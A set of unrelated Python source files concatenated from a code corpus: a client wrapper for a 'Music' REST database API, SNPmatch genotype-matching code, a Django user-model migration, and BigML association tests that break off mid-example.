                    self.logger.debug("   timeout = %s" % self.timeout)
                    self.logger.debug("   err = %s" % err)
                    self.logger.debug("   full url = %s" % full_url)
                    self.logger.debug("   request data = %s" % data_json)
                    self.logger.debug("   request headers = %s" % my_headers)
                    self.logger.debug("   status code = %s" % response.status_code)
                    self.logger.debug("   response = %s" % response.text)
                    self.logger.debug("   response headers = %s" % response.headers)
        # If we get here, an exception was raised for every url,
        # but we passed so we could try each endpoint. Raise status
        # for the last attempt (for now) so that we report something.
        if response is not None:
            self.logger.debug("Music: Full Url: %s", full_url)
            self.logger.debug("Music: %s ", err_message)
            response.raise_for_status()
class Music(object):
    """Wrapper for Music API.

    Thin convenience layer over :class:`REST` that builds Music REST paths
    for keyspace, table, row, index, and lock operations.
    """
    def __init__(self, _config, _logger):
        """Initializer. Accepts a lock_timeout for atomic operations.

        :param _config: nested dict with 'music', 'engine', 'logging', 'db'
                        sections; the Music password is stored encrypted
        :param _logger: logger passed through to the REST helper
        """
        self.logger = _logger
        # the stored password is decrypted with keys from three config sections
        pw = decrypt(_config["engine"]["ek"],
                     _config["logging"]["lk"],
                     _config["db"]["dk"],
                     _config["music"]["password"])
        kwargs = {
            'hosts': _config["music"]["hosts"],
            'port': _config["music"]["port"],
            'path': _config["music"]["path"],
            'timeout': _config["music"]["timeout"],
            'retries': _config["music"]["retries"],
            'userid': _config["music"]["userid"],
            'password': pw,
            'ns': _config["music"]["namespace"],
            'logger': _logger,
        }
        self.rest = REST(**kwargs)
        # locks created via this object; see delete_all_locks()
        self.lock_names = []
        self.lock_timeout = _config["music"]["lock_timeout"]
        self.replication_factor = _config["music"]["replication_factor"]

    @staticmethod
    def __row_url_path(keyspace, table, pk_name=None, pk_value=None):
        """Returns a Music-compliant row URL path.

        When both pk_name and pk_value are given, a primary-key filter is
        appended as a query string.
        """
        path = '/keyspaces/%(keyspace)s/tables/%(table)s/rows' % {
            'keyspace': keyspace,
            'table': table,
        }
        if pk_name and pk_value:
            path += '?%s=%s' % (pk_name, pk_value)
        return path

    def create_keyspace(self, keyspace):
        """Creates a keyspace. Returns True on HTTP success."""
        data = {
            'replicationInfo': {
                # 'class': 'NetworkTopologyStrategy',
                # 'dc1': self.replication_factor,
                'class': 'SimpleStrategy',
                'replication_factor': self.replication_factor,
            },
            'durabilityOfWrites': True,
            'consistencyInfo': {
                'type': 'eventual',
            },
        }
        path = '/keyspaces/%s' % keyspace
        response = self.rest.request(method='post', path=path, data=data)
        return response.ok

    def drop_keyspace(self, keyspace):
        """Drops a keyspace. Returns True on HTTP success."""
        data = {
            'consistencyInfo': {
                'type': 'eventual',
            },
        }
        path = '/keyspaces/%s' % keyspace
        response = self.rest.request(method='delete', path=path, data=data)
        return response.ok

    def create_table(self, keyspace, table, schema):
        """Creates a table.

        :param schema: dict mapping field names to Cassandra types
        """
        data = {
            'fields': schema,
            'consistencyInfo': {
                'type': 'eventual',
            },
        }
        self.logger.debug(data)
        path = '/keyspaces/%(keyspace)s/tables/%(table)s' % {
            'keyspace': keyspace,
            'table': table,
        }
        response = self.rest.request(method='post', path=path, data=data)
        return response.ok

    def create_index(self, keyspace, table, index_field, index_name=None):
        """Creates an index for the referenced table."""
        data = None
        if index_name:
            data = {
                'index_name': index_name,
            }
        pstr = '/keyspaces/%(keyspace)s/tables/%(table)s/index/%(index_field)s'
        path = pstr % {
            'keyspace': keyspace,
            'table': table,
            'index_field': index_field,
        }
        response = self.rest.request(method='post', path=path, data=data)
        return response.ok

    def version(self):
        """Returns version string."""
        path = '/version'
        response = self.rest.request(method='get', content_type='text/plain', path=path)
        return response.text

    def create_lock(self, lock_name):
        """Returns the lock id. Use for acquiring and releasing."""
        path = '/locks/create/%s' % lock_name
        response = self.rest.request(method='post', path=path)
        return json.loads(response.text)["lock"]["lock"]

    def acquire_lock(self, lock_id):
        """Acquire a lock. Returns True when the lock was granted."""
        path = '/locks/acquire/%s' % lock_id
        # raise400=False: a 400 here means "not acquired", not an error
        response = self.rest.request(method='get', path=path, raise400=False)
        return json.loads(response.text)["status"] == "SUCCESS"

    def release_lock(self, lock_id):
        """Release a lock."""
        path = '/locks/release/%s' % lock_id
        response = self.rest.request(method='delete', path=path)
        return response.ok

    def delete_lock(self, lock_name):
        """Deletes a lock by name."""
        path = '/locks/delete/%s' % lock_name
        response = self.rest.request(method='delete', path=path, raise400=False)
        return response.ok

    def delete_all_locks(self):
        """Delete all locks created during the lifetime of this object."""
        # TODO(JD): Shouldn't this really be part of internal cleanup?
        # FIXME: It can be several API calls. Any way to do in one fell swoop?
        for lock_name in self.lock_names:
            self.delete_lock(lock_name)

    def create_row(self, keyspace, table, values):
        """Create a row (eventual consistency)."""
        # self.logger.debug("MUSIC: create_row "+ table)
        data = {
            'values': values,
            'consistencyInfo': {
                'type': 'eventual',
            },
        }
        path = '/keyspaces/%(keyspace)s/tables/%(table)s/rows' % {
            'keyspace': keyspace,
            'table': table,
        }
        response = self.rest.request(method='post', path=path, data=data)
        return response.ok

    def insert_atom(self, keyspace, table, values, name=None, value=None):
        """Atomic create/update row."""
        data = {
            'values': values,
            'consistencyInfo': {
                'type': 'atomic',
            }
        }
        path = self.__row_url_path(keyspace, table, name, value)
        method = 'post'
        # self.logger.debug("MUSIC: Method: %s ", (method.upper()))
        # self.logger.debug("MUSIC: Path: %s", (path))
        # self.logger.debug("MUSIC: Data: %s", (data))
        self.rest.request(method=method, path=path, data=data)

    def update_row_eventually(self, keyspace, table, values):
        """Update a row. Not atomic."""
        data = {
            'values': values,
            'consistencyInfo': {
                'type': 'eventual',
            },
        }
        path = self.__row_url_path(keyspace, table)
        response = self.rest.request(method='post', path=path, data=data)
        return response.ok

    def delete_row_eventually(self, keyspace, table, pk_name, pk_value):
        """Delete a row. Not atomic."""
        data = {
            'consistencyInfo': {
                'type': 'eventual',
            },
        }
        path = self.__row_url_path(keyspace, table, pk_name, pk_value)
        response = self.rest.request(method='delete', path=path, data=data)
        return response.ok

    def delete_atom(self, keyspace, table, pk_name, pk_value):
        """Atomic delete row."""
        data = {
            'consistencyInfo': {
                'type': 'atomic',
            }
        }
        path = self.__row_url_path(keyspace, table, pk_name, pk_value)
        self.rest.request(method='delete', path=path, data=data)

    def read_row(self, keyspace, table, pk_name, pk_value):
        """Read one row based on a primary key name/value."""
        path = self.__row_url_path(keyspace, table, pk_name, pk_value)
        response = self.rest.request(path=path)
        return response.json()

    def read_all_rows(self, keyspace, table):
        """Read all rows."""
        return self.read_row(keyspace, table, pk_name=None, pk_value=None)
| StarcoderdataPython |
1639395 | <gh_stars>1-10
"""
SNPmatch
"""
import numpy as np
import pandas as pd
import scipy as sp
from scipy import stats
import numpy.ma
import logging
import sys
import os
from . import parsers
from . import snp_genotype
import json
log = logging.getLogger(__name__)
# likelihood-ratio cutoff used to pick "top hits" (3.841 is the chi-square
# 5% critical value at one degree of freedom)
lr_thres = 3.841
# minimum-SNP tunable; not referenced in this part of the module
snp_thres = 4000
# probability cutoff used when interpreting clusters of top hits
prob_thres = 0.98
def die(msg):
    """Write an error message to stderr and abort the process with status 1."""
    print('Error: ' + msg, file=sys.stderr)
    sys.exit(1)
def get_fraction(x, y, y_min=0):
    """Return the ratio x / y as a float, or NaN when the denominator y is
    at or below *y_min*."""
    return np.nan if y <= y_min else float(x) / y


# elementwise version; y_min stays a scalar across the broadcast
np_get_fraction = np.vectorize(get_fraction, excluded="y_min")
def likeliTest(n, y):
    """Log-likelihood statistic for observing y matches out of n informative
    sites, against an expected match rate of ~1.

    :param n: total informative sites
    :param y: number of matched sites (must not exceed n)
    :return: 1 for a perfect match, NaN when n or y is 0, otherwise the
             log-likelihood value
    """
    assert y <= n, "provided y is greater than n"
    p = 0.99999999
    if n == 0 or y == 0:
        return np.nan
    if y == n:
        return 1
    observed = float(y) / n
    return y * np.log(observed / p) + (n - y) * np.log((1 - observed) / (1 - p))
def test_identity(x, n, error_rate = 0.0005, pthres = 0.05, n_thres = 20):
if n <= n_thres:
return(np.nan)
st = stats.binom_test(int(n - x), n, p = float(error_rate), alternative='greater')
if st <= pthres:
return(float(0))
else:
return(float(1))
np_test_identity = np.vectorize(test_identity, excluded=["pthres", "error_rate", "n_thres"])
def matchGTsAccs(sampleWei, t1001snps, skip_hets_db = False):
    """Score every database accession against the sample's genotype weights.

    sampleWei columns hold per-position weights for the three genotype calls
    (column 0: homozygous ref, column 1: heterozygous, column 2: homozygous
    alt). t1001snps holds the database genotype codes (0 ref, 1 alt, 2 het;
    negative values are treated as missing via the masked arrays below).

    WARNING: when skip_hets_db is True, t1001snps is modified IN PLACE
    (het calls are overwritten with -1), so the caller's array changes.

    :return: (score, ninfo) — per-accession weighted match score, and the
             per-accession count of non-missing positions
    """
    assert sampleWei.shape[0] == t1001snps.shape[0], "please provide same number of positions for both sample and db"
    assert sampleWei.shape[1] == 3, "SNP weights should be a np.array with shape == n,3"
    ## Initilizing
    if skip_hets_db:
        t1001snps[t1001snps == 2] = -1
    num_lines = t1001snps.shape[1]
    TarGTs0 = np.zeros(t1001snps.shape, dtype="int8") ## Homo -- ref
    TarGTs1 = np.ones(t1001snps.shape, dtype="int8") + 1 ## Hets
    TarGTs2 = np.ones(t1001snps.shape, dtype="int8") ## Homo -- alt
    score = np.zeros( num_lines )
    # each term adds the sample weight for positions where the db genotype
    # equals the corresponding call; masked (negative) entries never match
    score = score + np.multiply(np.array(numpy.ma.masked_less(t1001snps, 0) == TarGTs0, dtype=int).T, sampleWei[:,0]).sum(axis = 1)
    score = score + np.multiply(np.array(numpy.ma.masked_less(t1001snps, 0) == TarGTs1, dtype=int).T, sampleWei[:,1]).sum(axis = 1)
    score = score + np.multiply(np.array(numpy.ma.masked_less(t1001snps, 0) == TarGTs2, dtype=int).T, sampleWei[:,2]).sum(axis = 1)
    # NOTE(review): when no entry is negative, masked_less(...).mask is the
    # scalar False rather than an array; the axis-0 sum below assumes an
    # array mask — confirm upstream always encodes missing calls as negatives
    ninfo = np.repeat(t1001snps.shape[0], num_lines) - np.sum(numpy.ma.masked_less(t1001snps, 0).mask.astype(int ), axis = 0)
    return((score, ninfo))
class GenotyperOutput(object):
    ## class object for main SNPmatch output
    def __init__(self, AccList, ScoreList, NumInfoSites, overlap, NumMatSNPs, DPmean ):
        """Bundle per-accession scores with overall run statistics.

        :param AccList: accession names
        :param ScoreList: per-accession match scores
        :param NumInfoSites: per-accession informative-site counts
        :param overlap: fraction of input positions found in the database
        :param NumMatSNPs: number of matched SNP positions
        :param DPmean: per-site read depth values (averaged when reported)
        """
        self.accs = np.array(AccList, dtype="str")
        self.scores = np.array(ScoreList, dtype="int")
        self.ninfo = np.array(NumInfoSites, dtype="int")
        self.overlap = overlap
        self.num_snps = NumMatSNPs
        self.dp = DPmean

    def get_probabilities(self):
        """Populate self.probabilies (sic — the misspelled attribute name is
        referenced by the other methods) with score/ninfo fractions."""
        probs = [get_fraction(self.scores[i], self.ninfo[i]) for i in range(len(self.accs))]
        self.probabilies = np.array(probs, dtype="float")

    @staticmethod
    def calculate_likelihoods(scores, ninfo, amin = "calc"):
        """Return (likelihoods, likelihood ratios) per accession.

        :param amin: "calc" to normalise against the best (minimum)
                     likelihood, or a number to normalise against directly
        """
        num_lines = len(scores)
        nplikeliTest = np.vectorize(likeliTest,otypes=[float])
        LikeLiHoods = nplikeliTest(ninfo, scores)
        if amin == "calc":
            TopHit = np.nanmin(LikeLiHoods)
        else:
            TopHit = float(amin)
        LikeLiHoodRatios = [get_fraction(LikeLiHoods[i], TopHit) for i in range(num_lines)]
        LikeLiHoodRatios = np.array(LikeLiHoodRatios, dtype="float")
        return((LikeLiHoods, LikeLiHoodRatios))

    def get_likelihoods(self, amin = "calc"):
        """Cache likelihoods and ratios on the instance (likelis / lrts)."""
        (self.likelis, self.lrts) = self.calculate_likelihoods(self.scores, self.ninfo, amin)

    def print_out_table(self, outFile):
        """Build the per-accession score table; write it as TSV when outFile
        is truthy, and return the DataFrame either way."""
        self.get_likelihoods()
        self.get_probabilities()
        output_table = pd.DataFrame( {
            'accs': self.accs,
            'matches': self.scores,
            'ninfo': self.ninfo,
            'probabilities': self.probabilies,
            'likelihood': self.likelis,
            'lrt': self.lrts,
            'num_snps': self.num_snps,
            'dp': np.nanmean(self.dp)
        } )
        # fix column order (dict ordering is not relied upon)
        output_table = output_table[ ['accs', 'matches', 'ninfo', 'probabilities', 'likelihood', 'lrt', 'num_snps', 'dp'] ]
        if outFile:
            output_table.to_csv( outFile, header = None, sep = "\t", index = None )
        return( output_table )

    def print_json_output(self, outFile):
        """Write the top hits (lrt below lr_thres), sorted by probability,
        plus an interpretation code, as pretty-printed JSON."""
        self.get_likelihoods()
        self.get_probabilities()
        topHits = np.where(self.lrts < lr_thres)[0]
        overlapScore = [get_fraction(self.ninfo[i], self.num_snps) for i in range(len(self.accs))]
        sorted_order = topHits[np.argsort(-self.probabilies[topHits])]
        (case, note) = self.case_interpreter(topHits)
        matches_dict = [(str(self.accs[i]), float(self.probabilies[i]), int(self.ninfo[i]), float(overlapScore[i])) for i in sorted_order]
        topHitsDict = {'overlap': [self.overlap, self.num_snps], 'matches': matches_dict, 'interpretation':{'case': case, 'text': note}}
        with open(outFile, "w") as out_stats:
            out_stats.write(json.dumps(topHitsDict, sort_keys=True, indent=4))

    def case_interpreter(self, topHits):
        """Classify the hit set into a (case, human-readable note) pair.

        Case 0: single unique hit; 1-4: increasingly specific kinds of
        ambiguity based on hit probabilities and database overlap.
        """
        overlap_thres = 0.5
        case = 1
        note = "Ambiguous sample"
        if len(topHits) == 1:
            case = 0
            note = "Unique hit"
        elif np.nanmean(self.probabilies[topHits]) > prob_thres:
            case = 2
            note = "Ambiguous sample: Accessions in top hits can be really close"
        elif self.overlap > overlap_thres:
            case = 3
            note = "Ambiguous sample: Sample might contain mixture of DNA or contamination"
        elif self.overlap < overlap_thres:
            case = 4
            note = "Ambiguous sample: Many input SNP positions are missing in db positions. Maybe sample not one in database"
        return(case, note)
class Genotyper(object):
    ## class object for main SNPmatch
    def __init__(self, inputs, g, outFile, run_genotyper = True, skip_hets_db = False, chunk_size = 1000):
        """Set up a genotyping run.

        :param inputs: parsed sample input (positions, weights, genotypes)
        :param g: snp_genotype.Genotype database wrapper
        :param outFile: output path prefix for score/JSON files
        :param run_genotyper: when True, run immediately and write outputs
        :param skip_hets_db: pass-through to matchGTsAccs (ignore db hets)
        :param chunk_size: positions processed per scoring batch
        """
        assert type(g) is snp_genotype.Genotype, "provide a snp_genotype.Genotype class for genotypes"
        inputs.filter_chr_names()
        self.chunk_size = chunk_size
        self.inputs = inputs
        self.g = g
        self.num_lines = len(self.g.g.accessions)
        self.outFile = outFile
        self._skip_db_hets = skip_db_hets
        if run_genotyper:
            self.result = self.genotyper()
            self.write_genotyper_output( self.result )

    def get_common_positions(self):
        """Cache (db indices, sample indices) of shared SNP positions."""
        self.commonSNPs = self.g.get_positions_idxs( self.inputs.chrs, self.inputs.pos )

    def filter_tophits(self):
        """Run the genotyper, then re-score only the indistinguishable top
        hits on their segregating SNPs to try to separate them."""
        self.result = self.genotyper()
        self.write_genotyper_output( self.result )
        self.result.get_likelihoods()
        topHits = np.where(self.result.lrts < lr_thres)[0]
        if len(topHits) == 1:
            log.info("Done! It is a perfect hit")
            return(None)
        log.info("#lines indistinguishable: %s" % len(topHits))
        log.info("refining likelihoods for only indistinguishable lines")
        if len(topHits) > (self.num_lines / 2):
            # refining over most of the panel would not be informative
            log.info("too many lines are indistinguishable, skipping refining likelihoods step")
            return(None)
        seg_ix = self.g.identify_segregating_snps( topHits )
        self.result_fine = self.genotyper( filter_pos_ix = seg_ix, mask_acc_ix = np.where(self.result.lrts >= lr_thres)[0] )
        log.info("writing output: %s" % self.outFile + ".refined.scores.txt")
        self.result_fine.print_out_table( self.outFile + ".refined.scores.txt" )

    def genotyper(self, filter_pos_ix = None, mask_acc_ix = None):
        """Score every accession against the sample in chunks.

        :param filter_pos_ix: optional db position indices to restrict to
        :param mask_acc_ix: optional accession indices to exclude from output
        :return: a GenotyperOutput
        """
        ScoreList = np.zeros(self.num_lines, dtype="float")
        NumInfoSites = np.zeros(len(self.g.g.accessions), dtype="uint32")
        self.get_common_positions()
        if filter_pos_ix is not None:
            assert type(filter_pos_ix) is np.ndarray, "provide np array for indices to be considered"
            t_ix = np.where(np.in1d(self.commonSNPs[0], filter_pos_ix))[0]
            if t_ix.shape[0] < 100:
                log.info("#positions in segregating sites are are too little: %s" % t_ix.shape[0])
            self.commonSNPs = (self.commonSNPs[0][t_ix], self.commonSNPs[1][t_ix] )
        NumMatSNPs = len(self.commonSNPs[0])
        # score in chunks to bound memory use on large databases
        for j in range(0, NumMatSNPs, self.chunk_size):
            matchedAccInd = self.commonSNPs[0][j:j+self.chunk_size]
            matchedTarInd = self.commonSNPs[1][j:j+self.chunk_size]
            matchedTarWei = self.inputs.wei[matchedTarInd,]
            t1001SNPs = self.g.g.snps[matchedAccInd,:]
            t_s, t_n = matchGTsAccs( matchedTarWei, t1001SNPs, self._skip_db_hets )
            ScoreList = ScoreList + t_s
            NumInfoSites = NumInfoSites + t_n
            if j % (self.chunk_size * 50) == 0:
                log.info("Done analysing %s positions", j+self.chunk_size)
        overlap = get_fraction(NumMatSNPs, len(self.inputs.pos))
        if mask_acc_ix is not None:
            assert type(mask_acc_ix) is np.ndarray, "provide a numpy array of accessions indices to mask"
            mask_acc_to_print = np.setdiff1d(np.arange( self.num_lines ), mask_acc_ix)
            return( GenotyperOutput(self.g.g.accessions[mask_acc_to_print], ScoreList[mask_acc_to_print], NumInfoSites[mask_acc_to_print], overlap, NumMatSNPs, self.inputs.dp) )
        return( GenotyperOutput(self.g.g.accessions, ScoreList, NumInfoSites, overlap, NumMatSNPs, self.inputs.dp) )

    def write_genotyper_output(self, result):
        """Write score table, matches JSON, and heterozygosity stat."""
        log.info("writing score file!")
        result.get_likelihoods()
        result.print_out_table( self.outFile + '.scores.txt' )
        result.print_json_output( self.outFile + ".matches.json" )
        getHeterozygosity(self.inputs.gt[self.commonSNPs[1]], self.outFile + ".matches.json")
        return(result)
def getHeterozygosity(snpGT, outFile='default'):
    """Return the fraction of heterozygous genotype calls in snpGT.

    When outFile names an existing matches JSON file, the value is also
    recorded in it under 'percent_heterozygosity'.
    """
    het_count = np.count_nonzero(parsers.parseGT(snpGT) == 2)
    het_fraction = get_fraction(het_count, len(snpGT))
    if outFile != 'default':
        with open(outFile) as json_out:
            stats_dict = json.load(json_out)
        stats_dict['percent_heterozygosity'] = het_fraction
        with open(outFile, "w") as out_stats:
            out_stats.write(json.dumps(stats_dict, sort_keys=True, indent=4))
    return het_fraction
def potatoGenotyper(args):
    """CLI entry point: parse the sample input, load the SNP database, and
    run the genotyper (optionally with top-hit refinement).

    :param args: dict with keys inFile, logDebug, hdf5File, hdf5accFile,
                 outFile, refine, skip_db_hets
    """
    inputs = parsers.ParseInputs(inFile = args['inFile'], logDebug = args['logDebug'])
    log.info("loading database files")
    g = snp_genotype.Genotype(args['hdf5File'], args['hdf5accFile'])
    log.info("done!")
    log.info("running genotyper!")
    if args['refine']:
        # refine mode defers the run so filter_tophits controls both passes
        genotyper = Genotyper(inputs, g, args['outFile'], run_genotyper=False, skip_db_hets = args['skip_db_hets'])
        genotyper.filter_tophits()
        log.info("finished!")
        return(None)
    genotyper = Genotyper(inputs, g, args['outFile'], run_genotyper=True, skip_db_hets = args['skip_db_hets'])
    log.info("finished!")
def pairwiseScore(inFile_1, inFile_2, logDebug, outFile = None, hdf5File = None):
    """Compare the SNP calls of two input files position-by-position.

    Computes, per chromosome and overall, the fraction of shared
    positions at which the two files carry identical genotype calls,
    plus the number of positions unique to each file.  If ``hdf5File``
    is given, comparisons are restricted to positions present in that
    SNP database.

    :param inFile_1: path of the first input file (parsed by ParseInputs)
    :param inFile_2: path of the second input file
    :param logDebug: verbosity flag forwarded to ParseInputs
    :param outFile: optional output prefix; stats are written to
        ``<outFile>.matches.json`` when given
    :param hdf5File: optional SNP database used to constrain positions
    :return: dict of statistics (per-chromosome, 'matches', 'unique',
        and 'hdf5' when a database was used)
    """
    snpmatch_stats = {}
    log.info("loading input files")
    inputs_1 = parsers.ParseInputs(inFile = inFile_1, logDebug = logDebug)
    inputs_2 = parsers.ParseInputs(inFile = inFile_2, logDebug = logDebug)
    if hdf5File is not None:
        log.info("loading database file to identify common SNP positions")
        g = snp_genotype.Genotype(hdf5File, None)
        snpmatch_stats['hdf5'] = hdf5File
        # Restrict file 1 to positions present in the database, then
        # intersect those with file 2's positions.
        # NOTE(review): get_positions_idxs/get_common_positions appear to
        # return paired index arrays -- confirm against snp_genotype.
        commonSNPs_1 = g.get_positions_idxs( inputs_1.chrs, inputs_1.pos )
        common_inds = snp_genotype.Genotype.get_common_positions( inputs_1.chrs[commonSNPs_1[1]], inputs_1.pos[commonSNPs_1[1]], inputs_2.chrs, inputs_2.pos )
        # Map the intersection indices back into file 1's original index space.
        common_inds = (commonSNPs_1[1][common_inds[0]], common_inds[1])
    else:
        log.info("identify common positions")
        common_inds = snp_genotype.Genotype.get_common_positions( inputs_1.chrs, inputs_1.pos, inputs_2.chrs, inputs_2.pos )
    log.info("done!")
    # Positions present in one file but not the other.
    unique_1 = len(inputs_1.chrs) - len(common_inds[0])
    unique_2 = len(inputs_2.chrs) - len(common_inds[0])
    common = np.zeros(0, dtype=int)
    scores = np.zeros(0, dtype=int)
    inputs_1.filter_chr_names()
    inputs_2.filter_chr_names()
    # Only chromosomes present in both inputs are compared.
    common_chrs = np.intersect1d(inputs_1.g_chrs_ids, inputs_2.g_chrs_ids)
    for i in common_chrs:
        # Indices (within the common set) that fall on chromosome i.
        perchrTarInd = np.where(inputs_1.g_chrs[common_inds[0]] == i)[0]
        log.info("Analysing chromosome %s positions", i)
        t_common = len(perchrTarInd)
        # Number of shared positions with identical genotype calls.
        t_scores = np.sum(np.array(inputs_1.gt[common_inds[0][perchrTarInd]] == inputs_2.gt[common_inds[1][perchrTarInd]], dtype = int))
        snpmatch_stats[i] = [get_fraction(t_scores, t_common), t_common]
        common = np.append(common, t_common)
        scores = np.append(scores, t_scores)
    snpmatch_stats['matches'] = [get_fraction(np.sum(scores), np.sum(common)), np.sum(common)]
    snpmatch_stats['unique'] = {"%s" % os.path.basename(inFile_1): [get_fraction(unique_1, len(inputs_1.chrs)), len(inputs_1.chrs)], "%s" % os.path.basename(inFile_2): [get_fraction(unique_2, len(inputs_2.chrs)), len(inputs_2.chrs)] }
    if outFile:
        log.info("writing output in a file: %s" % outFile + ".matches.json")
        with open(outFile + ".matches.json", "w") as out_stats:
            out_stats.write(json.dumps(snpmatch_stats, sort_keys=True, indent=4))
    log.info("finished!")
    return(snpmatch_stats)
| StarcoderdataPython |
3258897 | <reponame>UNCDarkside/DarksiteAPI<filename>darksite/account/migrations/0001_initial.py
# Generated by Django 2.1.4 on 2018-12-16 05:56
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
    """Initial migration creating the custom ``account.User`` model.

    Auto-generated by Django's makemigrations (see header); do not edit
    this migration by hand -- add a new migration for schema changes.
    """

    initial = True

    dependencies = [("auth", "0009_alter_user_last_name_max_length")]

    operations = [
        migrations.CreateModel(
            name="User",
            fields=[
                (
                    "password",
                    models.CharField(max_length=128, verbose_name="password"),
                ),
                (
                    "is_superuser",
                    models.BooleanField(
                        default=False,
                        help_text="Designates that this user has all permissions without explicitly assigning them.",
                        verbose_name="superuser status",
                    ),
                ),
                (
                    "created",
                    models.DateTimeField(
                        auto_now_add=True,
                        help_text="The time when the user was created.",
                        verbose_name="creation time",
                    ),
                ),
                (
                    "email",
                    models.EmailField(
                        help_text="The user's email address.",
                        max_length=254,
                        unique=True,
                        verbose_name="email address",
                    ),
                ),
                (
                    "id",
                    models.UUIDField(
                        default=uuid.uuid4,
                        help_text="A unique identifier for the user.",
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                (
                    "is_active",
                    models.BooleanField(
                        default=True,
                        help_text="Designates if the user is allowed to log in.",
                        verbose_name="active status",
                    ),
                ),
                (
                    "is_staff",
                    models.BooleanField(
                        default=False,
                        help_text="Designates if the user has access to the admin site.",
                        verbose_name="admin status",
                    ),
                ),
                (
                    "last_login",
                    models.DateTimeField(
                        blank=True,
                        help_text="The time of the user's last login.",
                        null=True,
                        verbose_name="last login time",
                    ),
                ),
                (
                    "name",
                    models.CharField(
                        help_text="A publicly displayed name for the user.",
                        max_length=100,
                        verbose_name="name",
                    ),
                ),
                (
                    "updated",
                    models.DateTimeField(
                        auto_now=True,
                        help_text="The last time the user was updated.",
                        verbose_name="update time",
                    ),
                ),
                (
                    "groups",
                    models.ManyToManyField(
                        blank=True,
                        help_text="The groups this user belongs to. A user will get all permissions granted to each of their groups.",
                        related_name="user_set",
                        related_query_name="user",
                        to="auth.Group",
                        verbose_name="groups",
                    ),
                ),
                (
                    "user_permissions",
                    models.ManyToManyField(
                        blank=True,
                        help_text="Specific permissions for this user.",
                        related_name="user_set",
                        related_query_name="user",
                        to="auth.Permission",
                        verbose_name="user permissions",
                    ),
                ),
            ],
            options={
                "verbose_name": "user",
                "verbose_name_plural": "users",
                "ordering": ("created",),
            },
        )
    ]
| StarcoderdataPython |
9690136 | # -*- coding: utf-8 -*-
#
# Copyright 2015-2022 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Creating association
"""
import sys
from .world import world, setup_module, teardown_module, show_doc, show_method
from . import create_source_steps as source_create
from . import create_dataset_steps as dataset_create
from . import create_association_steps as association_create
class TestAssociation(object):
    """End-to-end scenarios for BigML association resources: creation
    and renaming via the API, and rule queries on local associations."""

    def setup(self):
        """
        Debug information
        """
        print("\n-------------------\nTests in: %s\n" % __name__)

    def teardown(self):
        """
        Debug information
        """
        print("\nEnd of tests in: %s\n-------------------\n" % __name__)

    def test_scenario1(self):
        """
        Scenario: Successfully creating associations from a dataset:
            Given I create a data source uploading a "<data>" file
            And I wait until the source is ready less than <source_wait> secs
            And I create a dataset
            And I wait until the dataset is ready less than <dataset_wait> secs
            And I create associations from a dataset
            And I wait until the association is ready less than <model_wait> secs
            And I update the association name to "<association_name>"
            When I wait until the association is ready less than <model_wait> secs
            Then the association name is "<association_name>"
        """
        show_doc(self.test_scenario1)
        headers = ["data", "source_wait", "dataset_wait", "model_wait",
                   "association_name"]
        examples = [
            ['data/iris.csv', '10', '10', '50', 'my new association name']]
        for example in examples:
            example = dict(zip(headers, example))
            show_method(self, sys._getframe().f_code.co_name, example)
            source_create.i_upload_a_file(
                self, example["data"], shared=example["data"])
            source_create.the_source_is_finished(
                self, example["source_wait"], shared=example["data"])
            dataset_create.i_create_a_dataset(self, shared=example["data"])
            dataset_create.the_dataset_is_finished_in_less_than(
                self, example["dataset_wait"], shared=example["data"])
            association_create.i_create_an_association_from_dataset(self)
            association_create.the_association_is_finished_in_less_than(
                self, example["model_wait"])
            association_create.i_update_association_name(
                self, example["association_name"])
            # Renaming triggers an update; wait for it to settle before
            # asserting on the new name.
            association_create.the_association_is_finished_in_less_than(
                self, example["model_wait"])
            association_create.i_check_association_name(
                self, example["association_name"])

    def test_scenario2(self):
        """
        Scenario: Successfully creating local association object:
            Given I create a data source uploading a "<data>" file
            And I wait until the source is ready less than <source_wait> secs
            And I create a dataset
            And I wait until the dataset is ready less than <dataset_wait> secs
            And I create an association from a dataset
            And I wait until the association is ready less than <model_wait> secs
            And I create a local association
            When I get the rules for <"item_list">
            Then the first rule is "<JSON_rule>"
        """
        show_doc(self.test_scenario2)
        headers = ["data", "source_wait", "dataset_wait", "model_wait",
                   "item_list", "JSON_rule"]
        examples = [
            ['data/tiny_mushrooms.csv', '10', '20', '50', ["Edible"],
             {'p_value': 5.26971e-31, 'confidence': 1,
              'rhs_cover': [0.488, 122], 'leverage': 0.24986,
              'rhs': [19], 'rule_id': '000002', 'lift': 2.04918,
              'lhs': [0, 21, 16, 7], 'lhs_cover': [0.488, 122],
              'support': [0.488, 122]}]]
        for example in examples:
            example = dict(zip(headers, example))
            show_method(self, sys._getframe().f_code.co_name, example)
            source_create.i_upload_a_file(self, example["data"])
            source_create.the_source_is_finished(
                self, example["source_wait"], shared=example["data"])
            dataset_create.i_create_a_dataset(self, shared=example["data"])
            dataset_create.the_dataset_is_finished_in_less_than(
                self, example["dataset_wait"], shared=example["data"])
            association_create.i_create_an_association_from_dataset(self)
            association_create.the_association_is_finished_in_less_than(
                self, example["model_wait"])
            association_create.i_create_a_local_association(self)
            association_create.i_get_rules_for_item_list(
                self, example["item_list"])
            association_create.the_first_rule_is(
                self, example["JSON_rule"])

    def test_scenario3(self):
        """
        Scenario: Successfully creating local association object:
            Given I create a data source uploading a "<data>" file
            And I wait until the source is ready less than <source_wait> secs
            And I create a dataset
            And I wait until the dataset is ready less than <dataset_wait> secs
            And I create an association with search strategy "<strategy>" from a dataset
            And I wait until the association is ready less than <model_wait> secs
            And I create a local association
            When I get the rules for <"item_list">
            Then the first rule is "<JSON_rule>"
        """
        # BUGFIX: this previously documented test_scenario2, mislabeling
        # the scenario in the test output.
        show_doc(self.test_scenario3)
        headers = ["data", "source_wait", "dataset_wait", "model_wait",
                   "item_list", "JSON_rule", "strategy"]
        examples = [
            ['data/tiny_mushrooms.csv', '10', '20', '50', ["Edible"],
             {'p_value': 2.08358e-17, 'confidence': 0.79279,
              'rhs_cover': [0.704, 176], 'leverage': 0.07885,
